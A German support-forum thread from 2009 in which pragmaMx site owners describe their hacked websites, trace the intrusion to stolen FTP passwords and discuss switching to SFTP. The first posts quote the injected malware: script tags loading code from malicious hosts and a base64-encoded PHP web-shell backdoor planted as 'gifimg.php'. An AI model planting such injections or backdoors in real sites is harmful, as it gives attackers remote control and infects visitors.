Seite gehackt und Code und Files eingeschleust!

Begonnen von powerline, 09 Oktober 2009, 18:57:15

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 2 Gäste betrachten dieses Thema.

powerline

Hallo Leute,
als erstes hier mal zu einem Thread der im Mai entstand,

http://www.pragmamx.org/Forum-topic-29407-start-msg188436.html#msg188436

hier wurde die gleiche Seiteschon mal gehackt.

Also die Pragmainstallation liegt bei 1&1 und ist die aktuelle Version.
"pragmaMx 0.1.11, 1.33.2.12.2.9/2009-05-10"

Und nun wurde die Seite schon wieder gehackt, folgender Code wurde in fast alle HTML und PHP Dateien integriert:

<script src=http://singingbowlcentre.com/images/pas1_bg.php ></script>
oder
document.write('<script src=http://singingbowlcentre.com/images/pas1_bg.php ><\/script>');
oder
eval(base64_decode(RpPj0wOyR9TVFsnZSddKSk7')  (unnötiger code entfernt)

folgende PHP Datei mit Namen "gifimg.php" mit folgendem Inhalt war in allen "images" Ordnern!

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

Jetzt frag ich mich wie das passieren kann das diese Seite schon zum 2.mal angegriffen wurde?

Die CHMOD sind laut Anleitung gesetzt und auch sonst ist alles Standard.

Ich hoffe auf Eure Hilfe, Danke schon mal fürs nachdenken.. :gruebel: :thumbup:

Hatte in beiden Fällen zum Glück aktuelle BAckups!


powerline

Ich hab vor ca. 2 Wochen den Google Analytics Code eingebaut!

Ist der eventuell "angreifbar?
oder eine Flashslideshow auf der Startseite?

hat keiner ne Idee? :red:

lausbub

Hattest du den Code beim ersten mal auch eingebaut gehabt?
PHP Version: 5.2.11
MySql Version: 5.0.51a
Server-Version: Apache/2.2.8 (Linux/SUSE)
Pragma 1.12

powerline


powerline

also ich kann was die Sicherheit des CMS angeht mal grünes Licht geben.
Anhand von Logfiles haben wir festgestellt das der Angreifer per FTP auf den Server gekommen ist.
Die IPs kommen aus USA und Rumänien. Wir haben dort die Provider angeschrieben und darauf aufmerksam gemacht das diese Angriffe vermutlich auch von gehackten Servern anderer Firmen ausgehen. Eventuell melden sich noch mehr geschädigte und man kann dem einen oder anderen "Hacker" oder auch "Scriptkiddy" das Handwerk legen.
Da das vergebene Passwort nicht sehr sicher war (caracas) ist die Warscheinlichkeit sehr hoch das eine Brute-Force Attacke stattgefunden haben muss.
Wir haben nun sämtliche Passworte die es gibt aller FTP Zugänge und Webhosteraccounts erneuert und sicherer gemacht.

Sollte sich in den nächsten Tagen nicht mehr neues ergeben werde ich diesen Thread als erledigt kennzeichnen.

schönes WE noch an alle

Pac-Man

Hallu, ich bin auch mal wieder da...  :BD:

Also, eine meiner Seiten wurde auf ähnliche Weise gehackt und zwar gerade eben. Ich kann also noch nicht in die ftp.log schauen, die wird erst um 04:18 Uhr aktualisiert (glaube ich zumindest). Den schadhaften Code füge ich gekürzt ein, wollen ja den Kiddies kein Futter geben *find*

<?php eval(base64_decode('aWYoIWlzc2V0KCRqYWVpaDEpKXtmdW5jdGlvbiBqYWVpaCgkcyl7aWYocHJlZ19 [...]  RbJ2UnXSkpOw==')); ?> 

Herauskommen tut natürlich ein kleines Java-Scriptlein, das sieht so *zeig* aus:

<script src=http://ist-r.com/p002j4Nx/piiiiep.php ></script>         

Ich hab ein bisschen gepiept, damit keiner auf die Seite geht, die ist nämlich verseucht.

Ich hatte vor einigen Monaten schon ein mal einen Angriff gemeldet, da wars aber meine eigene Dämlichkeit, ähem...  :red:

Aber diesesmal habe ich keine Ahnung, wie das passieren konnte. Das FTP-PW ist alles andere als unsicher, im Gegenteil möchte ich behaupten. 

Bereits vorher gabs einige kleinere Angriffe, von denen auch kein Mensch weiss, wo der herkommt. Da kam dieses Java-Scriptchen heraus:

<!-- ad --><script type="text/javascript" src="http://www.freeguard.biz/j100coock.js"></script><!-- /ad -->                       

Mit diesem war jeweils nur die index.php im Hauptverzeichnis und die index.html im Verzeichnis "modules" verseucht. Mit dem neuen sind ALLE index.php und ALLE index.html verseucht, dazu noch einige config.php... ich kann den ganzen Schaden noch gar nicht überblicken.

Also wenn mir nun einer sagen könnte, woher das alles kommt und wie ich für andere Seiten entsprechende Vorkehrungen treffen kann, damit das nicht noch einmal passiert, wäre ich sehr dankbar... ich bin nämlich absolut ratlos...


Edit: Ich sehe gerade, die Datei gifimg.php habe ich auch in allen img-Ordnern...
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

Andi

Hoi :)

bist du sicher, das was da alles auf deiner Seite läuft richtig sicher ist?

http://pacman1973.pa.funpic.de/bilder/userbilder-upload.html
Also ich würde anonymen Besuchern nicht erlauben irgendetwas auf meinen Server zu laden...

Weiss ja nicht, was da noch alles läuft, ein pragmaMx ist das nicht, oder?
schön´s Grüssle, Andi

Pac-Man

Oh, ähm... ja nee, das ist selbstgemacht mit ohne CMS...  :red:

Die Seite, die gehackt wurde, ist diese:

http://www.ebookio.de

Aber wie Sie sehen, sehen Sie nichts...  :puzzled:
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

Pac-Man

Halluuuuu...  :cool:

Also... nach einem Blick in die ftp.log kann ich mich powerline anschließen, der Angriff lief tatsächlich über FTP. Ich frage mich, wie die DAS Passwort geknackt haben, denn das ist ziemlich lang und gar kryptisch... *doofguck*

Der Angriff kam scheinbar aus Ungarn, hier mal ein kleiner Auszug aus der Log-Datei:

mail.hlab.hu - - [13/Oct/2009:15:47:14 +0000] "GET /home/sites/site24/web/images/gifimg.php HTTP/1.0" 200 141 "FTP Client" "http://www.ebookio.de/"

Ergo: Die PWs werden nun noch länger und noch kryptischer...  :exclam:
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

FrankP

Einige Gründe für ein "abhanden gekommenes"  ftp-Passwort.

-ftp ist ein rel. unsicheres Protokoll, Daten können während der Übertragung abgefangen werden, deshalb immer mit sftp arbeiten.
-kompromittierte Wokstation.
-Passwortsniffer können oft monatelang unbemerkt auf einem Server laufen, Provider zumindest mal informieren.
-Keine ftp-Passwörter zur Anmeldung bei Shops oder Foren nutzen, auch nicht, wenn man dem Betreiber vertraut. Wer weiß schon, wie sicher seine Datenbank ist?
-Der "Kumpel", der einem vor 100 Jahren mal was gebastelt hat und ohje, seither wurde das Passwort nie geändert.

Das Passwort mal bei google und Co. eingeben und schauen, ob es in Listen auftaucht, kann helfen, zu ergründen, wie es auf die jeweilige Liste gekommen ist.
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

Pac-Man

Hallu Frank  :bye:

Erst einmal vielen Dank für deine Antwort!

Das mit dem Kumpel und dem PW ist gut, hihi... aber das kann ich ausschließen.

Ich habe das PW jetzt geändert. Das alte war über Google nicht zu finden. Der Provider ist informiert, auf Antwort warte ich noch.

Ich frage mich aber ernsthaft wie ein (case-sensitives) Passwort wie in etwa GtjU94Ew2U... geknackt werden kann?  :o

Na wie auch immer... Das mit dem SFTP muss ich mir einmal ansehen, das kenne ich bisher noch nicht. Ich weiss gar nicht, ob Total Commander das kann...?

Was meinst du denn mit "kompromittierte Wokstation" ?

Liebe Grüße vom Holger / Pac-Man   :thumbup:
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

FrankP

ZitatWas meinst du denn mit "kompromittierte Wo(r)kstation" ?
Ein Trojaner auf deinem PC z.B..

ZitatIch weiss gar nicht, ob Total Commander das kann...?
Der wohl bekannteste sftp-Client ist WinSCP: http://winscp.net/eng/docs/lang:de
Dein Web muss SSH/sftp "können". Theoretisch bieten das mittlerweile viele Provider an, doch die dazugehörige chrooted Umgebung haben soviel ich weiß noch nicht so viele auf die Reihe gekriegt. Einfach mal deinen Provider fragen, sollte bei professionellen Webs heutzutage aber Standard sein. Ein solches Passwort zu cracken ist nur per Zufall möglich und die Chancen hierzu sind extrem gering. Meist ist sowas nicht gecrackt, sondern durch vorgenannte Möglichkeiten bekannt geworden.
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

Dukewh

Zitat von: Pac-Man am 16 Oktober 2009, 11:14:31
Hallu Frank  :bye:

Ich weiss gar nicht, ob Total Commander das kann...?


TC kann alles  :thumbup: Ausrufezeichen und Punkt    :BD:

http://developer.berlios.de/projects/sftp4tc/


M.f.G.u.b.d.T. Duke



CMS-Version: pragmaMx 1.12.3.1.33.4.14 (2012-06-21)
PHP-Version:  5.3.19  (PHP-Info)
MySQL-Version: 5.5.28-log
Server-Version: Apache/2.2.22

Pac-Man

Zitat von: FrankP am 16 Oktober 2009, 12:16:24
ZitatWas meinst du denn mit "kompromittierte Wo(r)kstation" ?
Ein Trojaner auf deinem PC z.B..

[...]
Oh, WOKstation... auch schick!  :lollol: Tippfehler, schulligung...

Nuja, öhm... ähem... das ist zumindest nicht komplett auszuschließen...  :shame:

Ich bekomme das mit dem sftp nicht wirklich hin, obwohl ich mehrere Anleitungen (natürlich auch deine @Dukewh) gelesen habe. Ich bekomme einfach keine Verbindung hin.
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

Dukewh

M.f.G.u.b.d.T. Duke



CMS-Version: pragmaMx 1.12.3.1.33.4.14 (2012-06-21)
PHP-Version:  5.3.19  (PHP-Info)
MySQL-Version: 5.5.28-log
Server-Version: Apache/2.2.22

Pac-Man

Hoffentlich schümpft uns keiner, weil wir ein bisschen Offtopic sind...  :red:

Das meine ich, Dukewh... ich habs bei funpic versucht und bei manitu, bei beiden bekomme ich keine Verbindung. Den OpenSSL-Kram habe ich, sonst würde TC ja schon beim Anhaken von SSL/TLS meckern...

Und nu?  :pardon:
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

FrankP

Sind diese Webs überhaupt SSL-tauglich, d.h. ist der Dienst freigegeben? Welche Fehlermeldung erhälst du bei einem Einlogversuch?
Webhosting für pragmaMx www.abundus.de
Wer Butter will soll Butter kaufen, statt stundenlang auf die Milch einzudreschen und sich zu wundern, warum nur Käse rauskommt.

Pac-Man

Funpic vermutlich nicht... *moser* Da kommt die Meldung:

AUTH TLS 502 Command not implemented
AUTH SSL 502 Command not implemented


Bei manitu kommt:

AUTH TLS 500 AUTH not understood
AUTH SSL 500 AUTH not understood
Es gibt 10 Gruppen von Menschen: Diejenigen, die den
Binärcode verstehen und diese, die das nicht können... ;-)

Centurio

Bei Funpic wird es offenbar nicht unterstützt.
Manitu weiss garnicht, was Du von ihm willst  :puzzled:

Ich glaube mit den Freehostern kommst Du in Sachen SFTP ohnehin nicht weit. Was hindert Dich daran, für einen gescheiten Webspace ein paar Euro in die Hand zu nehmen?

powerline

So da ich jetzt auch wieder online sein kann mal ne Frage.
Ist jetzt jeder der kein SFTP benutzt, und ich gehe davon aus das das der Großteil aller FTP User ist so stark gefärdet wie wir?
Also die Accounts die es bei mir mittlerweile betrifft sind bei HostEurope und 1und1.
Denkt Ihr die können SFTP?
Und noch ne Frage: ist das SQL Passwort eventuell gefährdet wenn jemand sich per FTP Zugang zu Pragma verschafft hat?